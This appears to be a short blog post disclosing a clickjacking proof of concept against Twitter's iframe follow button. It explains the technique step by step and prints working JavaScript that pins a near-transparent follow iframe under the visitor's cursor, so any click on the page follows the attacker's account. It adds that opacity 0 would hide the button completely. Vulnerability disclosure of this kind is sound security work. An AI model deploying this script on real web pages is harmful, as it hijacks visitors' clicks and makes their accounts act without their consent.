A new follow button which allow to instantly follow a user is now available. The particularity of this new button ( so does google +1) is that user don’t need to go on Twitter.com website everythings i handled in iframe.

A french pentester realeased a POC ( prooof of concept) of the vulnerabilty :

Here is how it’s work :

• You set the iframe fully transparent/invisible via CSS.
• You capture the mouse event.
• When the user move the mouse, you move the twitter button iframe in order it always stay under the cursor.
• If the user click somewhere on your page, he will automatcly follow your account.

Here is the code :

if (!document.getElementsByClassName){
        document.getElementsByClassName = function(classname){
                for (i=0; i < document.getElementsByTagName("*").length; i++)
                {
                        if (document.getElementsByTagName("*").item(i).className == classname){
                                return new Array(document.getElementsByTagName("*").item(i));
                        }
                }
        }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = e.clientX - 20;
        twitterFollowIframe.style.top = e.clientY - 10;
}

You can find the proof of concept at this page : http://serphacker.com/twitter-follow-clickjacking.html

Destination server is down atm here are the POC source code with 20% of opacity:

SERP Hacker



Tested on Firefox 3 and IE7

Just move the mouse and click somewhere, you will automatically follow my twitter account if you are already connected on twittR, remember we can make the button totally hidden by setting opacity 0.


Follow SERP Hacker